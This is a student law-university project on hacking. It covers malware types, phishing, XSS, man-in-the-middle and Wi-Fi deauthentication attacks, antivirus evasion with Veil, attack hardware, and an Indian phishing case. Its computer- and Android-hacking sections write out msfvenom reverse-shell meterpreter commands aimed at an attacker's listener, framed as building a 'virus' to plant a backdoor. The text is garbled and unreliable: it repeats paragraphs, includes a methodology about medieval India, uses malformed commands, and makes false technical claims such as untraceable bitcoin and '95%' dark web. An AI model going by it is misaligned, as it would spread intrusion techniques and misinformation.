Вы находитесь на странице: 1из 25

1

DAMODARAM SANJIVAYYA NATIONAL LAW UNIVERSITY


V I S A K H A P A T N A M , A . P . , I N D I A

NAME OF THE PROJECT:


HACKING

SUBJECT:
LEGAL LANGUAGE AND WRITING
NAME OF THE FACULTY: MR. ARVIND NATH TRIPATHI

NAME OF THE STUDENT:


P.RAJ KUMAR

ROLL NO:
18LLB068

SEMESTER II
2

CERTIFICATE

This is to certify that P.RAJ KUMAR, a student of Semester II, Damodaram Sanjivayya
National Law University, has successfully completed the research on “HACKING” under
the guidance of MR. ARVIND NATH TRIPATHI during the year 2019-2020.

Signature of the Student. Signature of the Teacher.


3

ACKNOWLEDGEMENT:

I am grateful to our Administrative LEGAL LANGUAGE AND WRITING Mr.


ARVIND NATH TRIPATHI for her valuable guidance, significant suggestions and help for
accomplishing this project regarding “HACKING”. I have tried my best to collect information
about the project in various possible ways to depict clear picture about the given project topic.
4

ABSTRACT

The word hacking means getting in to a system in other words breaking in to the system and
gain access to sensitive data for good purpose or for bad purpose to find loop holes in the
technology and tries fix them and improves that piece of technology to large extent this will
improve security and prevent black hat hackers from doing illegal activities. And there are
different types of hackers they are 1) white hat hacker 2) black hat hacker and white hat
hackers are the members who will find loopholes in the systems and tries to fix them and
prevent black hat hacking and other hand who do malicious activities for their own personal
use in order to gain something intentionally without informing stealing data from user and
causing troubles to persons from stealing credit card information to hacking social media this
is what black hat hackers do. And in hacking there are different types of hacking example
social engineering, physical and mental hacking, hardware and software. Hacking is very
useful to study the present-day technology by learning hacking we can prevent additional
attacks by gain knowledge about particular sector in hacking and hacking is used in many
sectors example business, marker, public and other sector and day by day usage of hacking
increased.

RESEARCH METHODOLOGY: -

The researcher wants to a systematic study about the topics and factors related to the role of
religion, state and society in medieval India and how they have influenced the country. Books
Newspapers and magazines Internet are used.
5

CONTENTS

1) INTRODUCTION OF HACKING
2) TYPES OF HACKING
3) TYPES OF HACKERS
4) IMPORTANCE OF HACKING
5) METHODS OF HACKING
6) LANGUAGE USAGE IN HACKING
7) OPERATING SYSTEMS USED BY HACKERS
8) LINUX
9) EXPLOIT WRTING BENEFITS
10) PYTHON LANGUAGE ROLE IN HACKING
11) WIRELESS ATTACKS
12) VARIATIONS IN HACKING/TYPES
13) KEYLOGGER
14) VEIL EVASION ANTIVIRUS BYPASSING
15) FAILURE OF ANTIVIRUS
16) USB RUBBER DUCKY
17) WIFI PINE APPLE
18) TOR BROWSER
19) TRUTH ABOUT THE DARK WEB AND DEEP WEB
20) NSA (NATIONAL SECURITY AGENCY U.S.A) DEVELOPMENTS
21) DAVE KENNEDY SETOOLKIT(SOCIAL ENGINEERING)
22) BLUETOOTH VULNERABILITY
6

HACKING

INTRODUCTION:

The word hacking means getting in to a system in other words breaking in to the system and
gain access to sensitive data for good purpose or for bad purpose to find loop holes in the
technology and tries fix them and improves that piece of technology to large extent this will
improve security and prevent black hat hackers from doing illegal activities. And there are
different types of hackers they are 1) white hat hacker 2) black hat hacker and white hat
hackers are the members who will find loopholes in the systems and tries to fix them and
prevent black hat hacking and other hand who do malicious activities for their own personal
use in order to gain something intentionally without informing stealing data from user and
causing troubles to persons from stealing credit card information to hacking social media this
is what black hat hackers do. And in hacking there are different types of hacking example
social engineering, physical and mental hacking, hardware and software. Hacking is very
useful to study the present-day technology by learning hacking we can prevent additional
attacks by gain knowledge about particular sector in hacking and hacking is used in many
sectors example business, marker, public and other sector and day by day usage of hacking
increased.

Hacking can be used for many purposes and there are lot of pros and cons are there those who
use hacking for illegal purpose they may face consequences from authorities.
7

Hacking will take security to new level by making hard and efficient it can be lethal too and
people need to aware of hacking because day by day victims are increasing and people need to
have a knowledge about hacking in order to prevent from hacking and traps and our Indian
systems are weak which is not efficient to secure the people in many situations before it’s too
late.

There are many companies and programmers who are introducing many exploits, tools for
making powerful hacking scripts more powerful and efficient and this script are used by all
security researchers in the society.

TYPES OF HACKING:

There are many types of hacking including software, hardware including mental hacking and
these types are divided in to many sectors and it’s all comes under one-word hacking.

SOFTWARE HACKING:

Software hacking means where the attacker will inject piece of malware in to particular
software by giving directions to the malware and the main job of the malware is to do malicious
job from victim computer and share all victim’s information to attacker machine by port and
server. With this attacker can access the victim’s computer and gain access to everything
including personal information and attacker can control the victim machine via Linux and
terminal commands and the injected malware will be expired once job has done and attacker
can install backdoor so attacker can steal information at any time. Software hacking objective
is to manipulate the entire software made by companies which are used to help people but
instead it will be used for malicious purpose software will in may formats example Exe, Apk,
Ios, .bat. etc and software hacking caused many problems to the many companies including
medical sector, educational sector and the effects of software hacking are wide and their
software attacks like Ransomware attacks. Ransomware will mimic like malware the main of
the ransomware is to lock or hijack the particular system and demands ransom in order to
unlock the computer and files and once the ransomware is installed in the victim computer it
will encrypt all files in to code language in order to get the original files the victim need to pay
ransom or all the files will be deleted in the give time. And these are some effects of software
hacking in this they are many forms like malware, trojan, worms, and ransomware etc.
8

MALWARE:

Malware it is the one of the types in viruses in the main objective of malware is to do
background job in the victim’s computer in order to steal the personal information in a stealth
way and malicious way.

TROJAN:

The main objective of the trojan is to corrupt the system and it will compromise the victim
computer and attacker will execute commands from his machine to control the victim machine.

WORMS:

The main objective of this virus is to clone the particular file in to multiple files and its keeps
cloning the files due to this system overload and becomes slow.

RANSOMWARE:

Ransomware will mimic like malware the main of the ransomware is to lock or hijack the
particular system and demands ransom in order to unlock the computer and files and once the
ransomware is installed in the victim computer it will encrypt all files in to code language in
order to get the original files the victim need to pay ransom or all the files will be deleted in
the give time.

TYPES OF HACKERS:

There are many types of hackers they are white hats and black hats and ethical hackers will b
called as white hats and unethical hackers will be called as black hats and the ethical hackers
will do many good things and legal things and unethical hackers will cause many problems to
the society and troubles the government , companies and others the main of the black hats is to
gain something from the victims example including personal information and many more.

WHITE HAT HACKER:

White hacker means where he will find loop holes in the technology and he will fix the loop
holes and tries to protect victims from black hat attacks and he will give advice to the
9

companies in order to protect their data and many companies will hire them and pay them in
order to protect their data from other opposite parties and white hat hackers will create bunch
of programmes which will help in society.

BLACK HAT HACKER:

Black hat hacking and other hand who do malicious activities for their own personal use in
order to gain something intentionally without informing stealing data from user and causing
troubles to persons from stealing credit card information to hacking social media this is what
black hat hackers do.

IMPORTANCE OF HACKING:

Hacking is very important for the society and for technology as well as because and every
one should have particular idea about the hacking without having knowledge about hacking it
can leads to many dangerous and hacking is very important for technology because hacking
improves the security levels of technology day by day by finding the new loop holes and
that’s why hacking is very important and hacking will be used in many sectors example
industrial sectors, communications etc and the usage of the hacking is the same if there is no
hacking it is very difficult to find the problems in the piece technology so their will be no
improvement in security levels which can lead to fall in technology and hacking is used for
many purposes including catching the thefts and many other purpose. Hacking is very useful
to study the present-day technology by learning hacking we can prevent additional attacks by
gain knowledge about particular sector in hacking and hacking is used in many sectors
example business, marker, public and other sector and day by day usage of hacking
increased. Hacking can be used for many purposes and there are lot of pros and cons are there
those who use hacking for illegal purpose they may face consequences from authorities.
Hacking will take security to new level by making hard and efficient it can be lethal too and
people need to aware of hacking because day by day victims are increasing and people need
to have a knowledge about hacking in order to prevent from hacking and traps and our Indian
systems are weak which is not efficient to secure the people in many situations before it’s
too late. There are many companies and programmers who are introducing many exploits,
tools for making powerful hacking scripts more powerful and efficient and this script are used
by all security researchers in the society. And these are the important factors of hacking and it
is useful in many sectors as we said and hacking can be used for both ethical and unethical
10

purpose if it falls under wrong hands it can lead to may problems in the society and day by
day demand of hacking increasing and people need to have knowledge about the hacking so
they can survive in the digital world without proper knowledge it is very difficult to survive
in the digital world so hacking is very important and its plays very crucial when it comes to
the technology hacking is important and inside the hacking world there are many things and
different methods of hacking including software and hardware and there are many things
need to be consider in the hacking without the proper guidance hacking can be dangerous
small mistake can lead to entire collapse of the communications and lead to air crashes in the
sky due to the misuse of the hacking.

METHODS OF HACKING:

There are many methods of hacking including software and hacking and when it comes to the
hacking there are lot of ways and multiple ways to hack the particular thing and there are many
types for particular work and methods may vary from operating system to operating system
and hacking is divided in to physical and unphysical way.

XSS-SCRIPTING:
Cross-site scripting (XSS) is a type of computer security vulnerability normally determined in
internet applications. XSS allows attackers to inject client-side script into web pages seen with
the aid of different users. A cross-site scripting vulnerability might also be used with the aid of
attackers to bypass get right of entry to controls such as the same-origin policy. Cross-site
scripting carried out on web sites accounted for roughly 84% of all protection vulnerabilities
documented via Symantec as of 2007. Their impact can also range from a petty nuisance to a
considerable security risk, depending on the sensitivity of the facts dealt with by way of the
inclined web site and the nature of any protection mitigation applied by using the site's owner.

PHISHING:

Phishing is the strive to gather sensitive information such as usernames, passwords, and
credit card important points (and sometimes, indirectly, money), often for malicious reasons,
by masquerading as a truthful entity in a digital communication. The word is a neologism
created as a homophone of fishing due to the similarity of the use of a bait in an attempt to
capture a victim. Communications purporting to be from famous social net sites, public sale
sites, banks, online payment processors or IT administrators are often used to entice
11

unsuspecting victims. Phishing emails may additionally comprise hyperlinks to web sites that
are contaminated with malware. Phishing is commonly carried out through email spoofing or
instantaneous messaging, and it regularly directs customers to enter details at a faux internet
site whose seem and experience are nearly same to the legit one. Phishing is an example of
social engineering methods used to deceive users, and exploits the bad usability of current
web safety technologies. Attempts to deal with the developing wide variety of reported
phishing incidents consist of legislation, consumer training, public awareness, and technical
protection measures. Many websites have now created secondary tools for applications, like
maps for games, however they need to be virtually marked as to who wrote them, and users
must now not use the same passwords somewhere on the internet.
Phishing is a persistent threat, and the hazard is even large in social media such as Facebook,
Twitter, and Google. Hackers could create a clone of a website and inform you to enter non-
public information, which is then emailed to them. Hackers often take benefit of these sites to
assault human beings the use of them at their workplace, homes, or in public in order to take
private and safety information that can affect the consumer or company. Phishing takes
benefit of the trust that the consumer may additionally have when you consider that the user
may additionally now not be capable to inform that the site being visited, or application being
used, is not real; therefore, when this occurs, the hacker has the chance to gain the private
facts of the focused user, such as passwords, usernames, safety codes, and credit card
numbers, amongst other things.

TYPES OF PHISHING:
A try to collect facts such as usernames, passwords, and deposit card small print with the aid
of masquerading as a sincere entity in an electronic communication. In October 2013, emails
purporting to be from American Express have been despatched to an unknown variety of
recipients. An easy DNS exchange could have been made to thwart this spoofed email,
however American Express failed to make any changes.
SPEAR PHISHING: -
Phishing attempts directed at precise individuals or businesses have been termed spear
phishing. Attackers may acquire personal statistics about their target to expand their
probability of success. This approach is, by means of far, the most profitable on the internet
today, accounting for 91% of attacks.

HACKING A COMPUTER:
12

The attacker will make a particular virus for particular system and the attacker will set
LHOST and LPORT for transferring and receiving data and to control the victim pc from his
attacker machine and he will add IP address for the LHOST and LPORT he will add the port
number and there will be meterpreter function in the structure.

The virus structure will be (msfvenom -p windows/meterpreter/reverse_tcp


LHOST=192.168.1.101 LPORT=8080 -x64 -o root/Desktop) once the execution of the
command the virus will be created and the attacker will send virus to victim computer in
many ways by site redirecting or through MITM attacks by using particular tools in this the
attacker will hack victims pc and he will set backdoor after gaining access to the pc and he
will steal all the information.

HACKING ANDROID PHONE:

The attacker will make a particular virus for particular system and the attacker will set
LHOST and LPORT for transferring and receiving data and to control the victim pc from his
attacker machine and he will add IP address for the LHOST and LPORT he will add the port
number and there will be meterpreter function in the structure.

The virus structure will be (msfvenom -p android/meterpreter/reverse_tcp


LHOST=192.168.1.101 LPORT=8080 -ar x64 -o root/Desktop) once the execution of the
command the virus will be created and the attacker will send virus to victim computer in
many ways by site redirecting or through MITM attacks by using particular tools in this the
attacker will hack victims pc and he will set backdoor after gaining access to the pc and he
will steal all the information.

MAN, AND IN THE MIDDLE ATTACKS(MITM):

Man in the middle attacks is a type of attacks where the attacker will try to monitor the victim
pc by some additional mitm tools like xerosploit the attacker will hijack the network of a
victim example wife and he will find the clients in the wife system and he will set the target
to the clients and he will exploit the script by this attacker can redirect the websites while
victim surfing and he will redirect to fake phishing page to steal the information from the
victim and this is the one of the popular attack in the hacking it will be used by majority of
hackers.

SCRIPT WRITING AND AUTOMATION:


13

Here the attacker will use the scripts which are coded by python and these ae very persistent
to use and easy to use once the script will loaded the entire process will be automatically
done in minutes and it will be used many hacker who don’t know proper coding scripts are
very useful for them and these are specially coded by the professionals and programmers who
have vast experience in the ethical hacking field and it is very easy for them to code for this
they will learn may languages including python, java, Perl, ruby and many more languages
and now a days scripts are widely available for all members because of it illegal hacking in
the particular nation and these are main and important usages of the script writing.

BLUE BORNE BLUETOOTH VULNERABILITY:

It is a type of vulnerability in Android phone where a attacker can hack a phone using
Bluetooth vulnerability based on this attacker can steal media files and the main advantage of
this attack is the victim never know that his phones has been hijacked and the attacker not
only can steal media files like photos and audio files he can take pictures also without
knowing the victim and this is the blue borne vulnerability because of this many device are
effected once this spyware reaches to the victim phone it will spread to other devices near by
so it can hack bunch of devices which Bluetooth enabled.

DDOS ATTACK:

This attack will be used for to take websites down for several minutes and this attack is
widely used by many attackers here the attacker will hack bunch of android phones and he
tries to bunch requests to servers through victims phone due to over load the server will be
down do to this many people will suffer and website will not load for several hours. Due to
this many process and works will stop and it will be difficult for the website to process entire
work.

LANGUAGE USAGE IN HACKING:

There are many languages are used in hacking including python, java etc and programming is
very important in the hacking without proper language it will be very difficult to hack and
along with there are will be a bunch of codes in the language like handlers and strings which
are very important in the hacking and this languages are widely used in many python and
14

hacking scripts its plays crucial role in the entire script and languages should be used widely
in order understand the procedure of hacking so language plays important role in hacking.

OPERATING SYSTEMS USED BY HACKERS:

Hackers use only Linux some may use other operating systems depends on them in hacking
widely Linux is used because it has powerful linux terminal which has root access compare
to normal command line with this PowerShell we can command computer without any
restrictions they can do anything with shell because the computer will obey the shell that’s
why lot of hacker use Linux as operating system.

LINUX:

Linux is a open source operating system which have kernel now a days Linux is widely used
in many devices including android phones and many electronical devices including web
servers etc. and it is the one of the complicated operating system compare to windows and it
is not friendly interface for first time learners the main aim of the Linux is run the programs
fast and in efficient way Linux will be used by hackers and programmers and software
developers and it will be main used for servers because security in Linux is strong so Linux is
widely used in every digital sector and Linux will provide you wide range options including
customizations and many more it gives the freedom of running any programs these are main
features of the Linux and there are many types of Linux distributions are available Linux
mint, Debian etc.

EXPLOIT WRTING IN HACKING:

Exploit writing will plays very important in hacking and it plays crucial role in the hacking
without exploit writing we cannot determine the function of exploits and exploits are the tools
which is used to get in to the system and this tools are divided in to many sections and there
will be different methods for different vulnerability and because of exploit writing there will
be a huge scope in the hacking and the exploit writing helps to find loop holes in the new
present technology and with exploit writing there will be many uses in the hacking not only
in hacking but the programmers will use them widely in the software development as a
hacking he need to learn exploit writing by practicing CTF and it is capture the flag test
15

where the hacker need to pass all the test set by researchers where he need to break in to the
systems in the limited time and he need to find new things and new methods with in limited
time and those exploit will be distributed in GitHub and it will be used by developers and the
hacker will understand how to debug the computer and he will find the vulnerability.

PYTHON ROLE IN HACKING:

Python is a type of programming language which is very easy to understand and python
widely used in hacking to automate things or to develop the exploits and python is a powerful
language where it can command the system to do things and in python there are many
possible ways including it plays a crucial role in the hacking and many of the hacking scripts
are made with the help of python and there is wide range of flexibility and lot of tools
available for the python and pythons makes the things easy and in smooth way and many of
the scripts will mostly in python language with the help of python there are many uses of
python not only in the hacking python is used for making games, and for electrical systems
and this is the important role in hacking.

WIRELESS ATTACKS:

There are many types wireless attacks used by attackers this attack mainly effects Bluetooth
and WIFI systems. And there are many types of attacks in wireless attacks.

1) Wi-Fi jamming
2) Wi-Fi phisher
3) Wpa 2 and wep attack
4) Krack

The attacker will turn his machine into monitor mode that means wlan0 to wlan0mon where
he can all networks clearly including beacons and data travel etc and attacker will send
deauth packets to the Wi-Fi and the Wi-Fi system will delay for seconds when Wi-Fi tries to
reconnect to the victim device and Wi-Fi handshake will be captured by the attacker machine
and the attacker will use this handshake he will krack using net cat etc and Wi-Fi jammer also
works the same like wifi deauther.

VARIATIONS IN HACKING:

Software hacking objective is to manipulate the entire software made by companies which
are used to help people but instead it will be used for malicious purpose software will in may
16

formats example Exe, Apk, Ios, .bat. etc and software hacking caused many problems to the
many companies including medical sector, educational sector and the effects of software
hacking are wide and their software attacks like Ransomware attacks. Ransomware will
mimic like malware the main of the ransomware is to lock or hijack the particular system and
demands ransom in order to unlock the computer and files and once the ransomware is
installed in the victim computer it will encrypt all files in to code language in order to get the
original files the victim need to pay ransom or all the files will be deleted in the give time.
And these are some effects of software hacking in this they are many forms like malware,
trojan, worms, and ransomware etc. Malware it is the one of the types in viruses in the main
objective of malware is to do background job in the victim’s computer in order to steal the
personal information in a stealth way and malicious way. ransomware is to lock or hijack the
particular system and demands ransom in order to unlock the computer and files and once the
ransomware is installed in the victim computer it will encrypt all files in to code language in
order to get the original files the victim need to pay ransom or all the files will be deleted in
the give time. The virus structure will be (msfvenom -p android/meterpreter/reverse_tcp
LHOST=192.168.1.101 LPORT=8080 -ar x64 -o root/Desktop) once the execution of the
command the virus will be created and the attacker will send virus to victim computer in
many ways by site redirecting or through MITM attacks by using particular tools in this the
attacker will hack victims pc and he will set backdoor after gaining access to the pc and he
will steal all the information. The attacker will make a particular virus for particular system
and the attacker will set LHOST and LPORT for transferring and receiving data and to
control the victim pc from his attacker machine and he will add IP address for the LHOST
and LPORT he will add the port number and there will be meterpreter function in the
structure. Man in the middle attacks is a type of attacks where the attacker will try to monitor
the victim pc by some additional mitm tools like xerosploit the attacker will hijack the
network of a victim example wife and he will find the clients in the wife system and he will
set the target to the clients and he will exploit the script by this attacker can redirect the
websites while victim surfing and he will redirect to fake phishing page to steal the
information from the victim and this is the one of the popular attack in the hacking it will be
used by majority of hackers. Here the attacker will use the scripts which are coded by python
and these ae very persistent to use and easy to use once the script will loaded the entire
process will be automatically done in minutes and it will be used many hacker who don’t
know proper coding scripts are very useful for them and these are specially coded by the
professionals and programmers who have vast experience in the ethical hacking field and it is
17

very easy for them to code for this they will learn may languages including python, java, Perl,
ruby and many more languages and now a days scripts are widely available for all members
because of it illegal hacking in the particular nation and these are main and important usages
of the script writing. It is a type of vulnerability in Android phone where a attacker can hack
a phone using Bluetooth vulnerability based on this attacker can steal media files and the
main advantage of this attack is the victim never know that his phones has been hijacked and
the attacker not only can steal media files like photos and audio files he can take pictures also
without knowing the victim and this is the blue borne vulnerability because of this many
device are effected once this spyware reaches to the victim phone it will spread to other
devices nearby so it can hack bunch of devices which Bluetooth enabled. This attack will be
used for to take websites down for several minutes and this attack is widely used by many
attackers here the attacker will hack bunch of android phones and he tries to bunch requests
to servers through victims phone due to over load the server will be down do to this many
people will suffer and website will not load for several hours. Due to this many process and
works will stop and it will be difficult for the website to process entire work. XSS allows
attackers to inject client-side script into web pages seen with the aid of different users. A
cross-site scripting vulnerability might also be used with the aid of attackers to bypass get
right of entry to controls such as the same-origin policy. Cross-site scripting carried out on
web sites accounted for roughly 84% of all protection vulnerabilities documented via
Symantec as of 2007. Their impact can also range from a petty nuisance to a considerable
security risk, depending on the sensitivity of the facts dealt with by way of the inclined web
site and the nature of any protection mitigation applied by using the site's owner.

KEYLOGGER:

It is type of virus that is used by the hacker to record the keywords which is used by the
victim to steal sensitive information it called keylogger many of us are prone from keylogger
and keylogger is made by the simple python script and there are many types of keylogger like
honeybee logger it is a type of logger which can bypass the antivirus and steal the sensitive
information from the victim machine keylogger can be passed from the thumb drives, drives
and from mails in order to prevent from key logger we should not replay to spam mails and
many things which are from unknown users and it is important to know the symptoms of the
keylogger if your computer effected with the key logger the computer will become slow and
you may see delay in the words and other warnings are automatic shutdown of the computer
18

which can indicate there is malware or keylogger in the computer in the system we should be
aware while downloading any files from internet first we need to scan with totalvirus.com or
nodistribute.com or you need to avoid the installation keylogger may be hiding in your phone
we need to active firewall to in order to prevent keylogger.

VEIL EVASION ANTIVIRUS BYPASSER:

Veil evasion is a powerful tool which was made by the python and Perl and it is used to
bypass the antivirus in the computer veil evasion will generate the payloads which are cannot
be detected by the antivirus by changing the source codes and replacing with bat and shell
extensions and veil evasion can generate wide range of viruses with different forms like pdf
and word too and veil evasion can generate 64-bit and 32-bit versions too and it is a powerful
tool which can be run Debian Linux and veil evasion can create the meterpreter so the
attacker access many things from the victim and most of the anti-viruses company failed to
solve the issue.

FAILURE OF ANTIVIRUS:

Many people believe that anti-virus will make everything right and secure but the actual truth
is anti-virus will not protect you from you all the attacks because now a days hackers using
such advance tools like veil evasions which can bypass the antivirus which cannot be
detected the antivirus and hackers gaining access to the system and steal information first we
need to see how antivirus works antivirus will have a database and there will be a copy of a
virus binary code in the data base when the virus enters in to the system it will match the
code with exact virus then only it can declare is a virus and if the binary code was not
available in the database then it cannot declare is a virus now a days hackers are changing the
binary code in the particular virus this is the one of the backward in the country.

USB RUBBER DUCKY:

It was thumb drives which was designed by the hak5.com who are advanced in hardware
hacking and software and the provided this power tool to get access in to the system very
easily without detection the main of the this drive to execute the malicious code right in to the
system shell where it can be executed in seconds with this attacker can gain access to the
victim computer with in no time the main advantage of the this tool is it will act as mouse and
keyword while the drive was inserted in the computer so the computer thinks that it is a
removable device so the computer will not scan the device and in order to prevent this we
should not insert random drives in computers or which you got near by which is not yours.
19

WIFI-PINEAPPLE:

Wi-Fi pineapple is a Wi-Fi tool which was created by the hak5.com in order to capture the
credentials and personal data by via fake Wi-Fi it works like hotspot and it can be used for
the man and the middle attacks the attacker will configure dns server which will make the
victim to redirect to wrong site and forces victim to download malicious file which is harmful
and by this attacker can take control of the victim system and he can access the media files
with in no time in order to avoid this attacks we should not connect public WIFI which are
very harmful.

TOR-BROWSER:

It is a type of browser which is linked many Internet protocols main purpose to hide from
internet were the activities done by the attacker will be not visible and name of the tor
browser comes from that “As we see there are many layers in onion” and tor browser also
covered by many Internet protocols which is very difficult to catch the attacker and tor
browser not only useful for hacking it is used for private searching and to access illegal sites
like dark web and deep web.

TRUTH ABOUT THE DARK WEB AND DEEP WEB:

Today we just only saw 5% of internet remaining 95% which was deep web and dark web
there will be a sensitive data inside that and there will be inappropriate things in the web
which will be very disturbing and inside the web there will ne live murders and violence
where it is unpleasant to see them and there will be selling and buying of drugs and illegal
guns takes place inside the deep web and dark web and it is impossible to catch the dealers
and buyers and no one knows because the transaction will happen through the bitcoin which
is untraceable and there many things like cutting hands, cooking humans, child abuse and
animal abuse authorities and government warned people not to visit the that sites which are
unpleasant if any person access the sites the authority will catch him and they will punish and
in order to access the these deep web and dark web we need to have special browser like tor
browser.
20

NATIONAL SECURITY AGENCY(USA):

National security agency of united states is security agency who will take care of IT sector
they will research and create special hacking exploits which can give access to any device
and the agency have powers to apply the tools on anyone and they created the eternal blue
double pulsar which was a exploit it can hack windows system by Internet Protocols and
access many devices and to access the private data of people and back in the end the hacker
group called shadow brokers who hacked the NSA and leaked the Eternal blue double pulsar
due to this many system were hacked because of it and the main aim of the NSA is to develop
more tactical exploits and tools and encourages the cyber world with advance technology and
security.

DAVE KENNEDY(SETOOLKIT):

Setoolkit was created by the Dave Kennedy owner of trusted sec company and this tool will
manipulate the websites and tries to steal the social media information through websites
where it can clone the orginal website and it will creates fake website its looks like same but
it is not when the victim enters the information in the site the information will travel to the
tool where we can see the passwords and username where we can trick the people and we can
play with there minds and along with phishing tools there are many tools like sms bombing
and fake https certificates and it can deliver through via website if the victim runs the java
applet the attacker can gain access to the victim computer all we need to do is set LHOST and
LPORT and the script will run automatically we can add custom websites to clone.

BLUETOOTH VULNERABILITY:

It is a type of vulnerability in Android phone where a attacker can hack a phone using
Bluetooth vulnerability based on this attacker can steal media files and the main advantage of
this attack is the victim never know that his phones has been hijacked and the attacker not
only can steal media files like photos and audio files he can take pictures also without
knowing the victim and this is the blue borne vulnerability because of this many device are
effected once this spyware reaches to the victim phone it will spread to other devices nearby
so it can hack bunch of devices which Bluetooth enabled and there is chance of the attacker
will hijack the network of a victim example wife and he will find the clients in the wife
21

system and he will set the target to the clients and he will exploit the script by this attacker
can redirect the websites while victim surfing and he will redirect to fake phishing page to
steal the information from the victim and this is the one of the popular attack in the hacking it
will be used by majority of hackers and by the this vulnerability the attacker can actually gain
full admin access through his misson.

CASES ON HACKING: -

NASSCOM VS. AJAY SOOD & OTHERS: -

Elab0rating 0n the c0ncept 0f ‘phishing’, in 0rder t0 lay d0wn a precedent in lndia, the c0urt
stated that it is a f0rm 0f internet fraud where a pers0n pretends t0 be a legitimate ass0ciati0n, such
as a bank 0r an insurance c0mpany in 0rder t0 extract pers0nal data fr0m a cust0mer such as access
c0des, passw0rds, etc. Pers0nal data s0 c0llected by misrepresenting the identity 0f the legitimate
party is c0mm0nly used f0r the c0llecting party’s advantage. c0urt als0 stated, by way 0f an
example, that typical phishing scams inv0lve pers0ns wh0 pretend t0 represent 0nline banks and
siph0n cash fr0m e-banking acc0unts after c0nning c0nsumers int0 handing 0ver c0nfidential
banking details.

The Delhi HC stated that even th0ugh there is n0 specific legislati0n in lndia t0 penalise
phishing, it held phishing t0 be an illegal act by defining it under lndian law as “a misrepresentati0n
made in the c0urse 0f trade leading t0 c0nfusi0n as t0 the s0urce and 0rigin 0f the e-mail causing
immense harm n0t 0nly t0 the c0nsumer but even t0 the pers0n wh0se name, identity 0r passw0rd
is misused". The c0urt held the act 0f phishing as passing 0ff and tarnishing the plaintiff’s image.

The plaintiff in this case was the Nati0nal Ass0ciati0n 0f S0ftware and Service C0mpanies
(Nassc0m), lndia’s premier s0ftware ass0ciati0n. The defendants were 0perating a placement
agency inv0lved in head-hunting and recruitment. ln 0rder t0 0btain pers0nal data, which they
22

c0uld use f0r purp0ses 0f head-hunting, the defendants c0mp0sed and sent e-mails t0 third parties
in the name 0f Nassc0m.

The high c0urt rec0gnised the trademark rights 0f the plaintiff and passed an ex-parte ad-interim
injuncti0n restraining the defendants fr0m using the trade name 0r any 0ther name deceptively
similar t0 Nassc0m. The c0urt further restrained the defendants fr0m h0lding themselves 0ut as
being ass0ciates 0r a part 0f Nassc0m.

The c0urt app0inted a c0mmissi0n t0 c0nduct a search at the defendants’ premises. Tw0 hard
disks 0f the c0mputers fr0m which the fraudulent e-mails were sent by the defendants t0 vari0us
parties were taken int0 cust0dy by the l0cal c0mmissi0ner app0inted by the c0urt.

The 0ffending e-mails were then d0wnl0aded fr0m the hard disks and presented as evidence in
c0urt. During the pr0gress 0f the case, it became clear that the defendants in wh0se names the
0ffending e-mails were sent were fictiti0us identities created by an empl0yee 0n defendants’
instructi0ns, t0 av0id rec0gniti0n and legal acti0n. On disc0very 0f this fraudulent act, the fictiti0us
names were deleted fr0m the array 0f parties as defendants in the case.

Subsequently, the defendants admitted their illegal acts and the parties settled the matter thr0ugh
the rec0rding 0f a c0mpr0mise in the suit pr0ceedings. Acc0rding t0 the terms 0f c0mpr0mise, the
defendants agreed t0 pay a sum 0f Rs1.6 milli0n t0 the plaintiff as damages f0r vi0lati0n 0f the
plaintiff’s trademark rights. The c0urt als0 0rdered the hard disks seized fr0m the defendants’
premises t0 be handed 0ver t0 the plaintiff wh0 w0uld be the 0wner 0f the hard disks.

.C0nclusi0n

Fr0m l0fty beginnings as expert pr0grammers and curi0us intellectuals, the hacker mentality
ev0lved 0ver time int0 a multifari0us w0rld view. Hacking is seen in pr0gramming, and in the
legal semi-legal, and illegal activities 0f many white, grey, and black hat hackers. All seem t0
adhere t0 different aspects 0f the Hacker Ethic. A hacker has always been s0me0ne wh0 pushes
the b0unds 0f techn0l0gy. Generally, they have been affiliated with the 0pen s0urce m0vement
and have been kn0wn t0 put s0me 0f their w0rk in the public d0main. As c0mputing has
ev0lved, we have seen a m0ve away fr0m inn0vati0ns in hardware, and 0nt0 s0ftware, and
n0w 0nt0 the lnternet. Based 0n hist0ry we see that newer fields 0f c0mputing
23

are generally the places where hackers have the largest impact. This w0uld lead t0 the
c0nclusi0n that the impact 0f hackers will be felt m0st in the devel0pments t0 d0 with the
lnternet in the sh0rt term, and in the medium term it w0uld seem inevitable that 0ther newer
fields 0f c0mputing w0uld attract the interest 0f hackers. There is already significant buzz
surr0unding sens0r netw0rks and m0tes, s0 it w0uld n0t be surprising t0 see a large am0unt
0f inn0vati0n in these areas.
ln the security realm, we see m0re and m0re activity: spyware, viruses, spam. But as the number
0f malici0us black hats increases, we can expect a c0rresp0nding increase 0f security j0bs and
white hats. We expect m0re and m0re high-pr0file attacks 0n public targets, and tighter
c0ntr0ls via legislature. The future 0f the w0rd "hacker" is unlikely t0 be as varied as its past.
Since the w0rd has entered the mainstream and many members 0f the hacker c0mmunity are
willing t0 let the eternal "hacker vs. cracker" flame war die, we can predict that "black hat"
will be its primary definiti0n as we m0ve int0 the future. This predicti0n, 0f c0urse, makes the
tenu0us assumpti0n that n0 new definiti0ns devel0p. Given that the current definiti0n has
disseminated with such great speed and 0ver the vi0lent 0bjecti0ns 0f the 0riginal hacker
c0mmunity, it is certainly likely that with the end 0rsement 0f the j0urnalism c0mmunity and
the wider English-speaking w0rld, this nascent definiti0n 0f hacker may usurp the 0ld 0ne.
24
25

Вам также может понравиться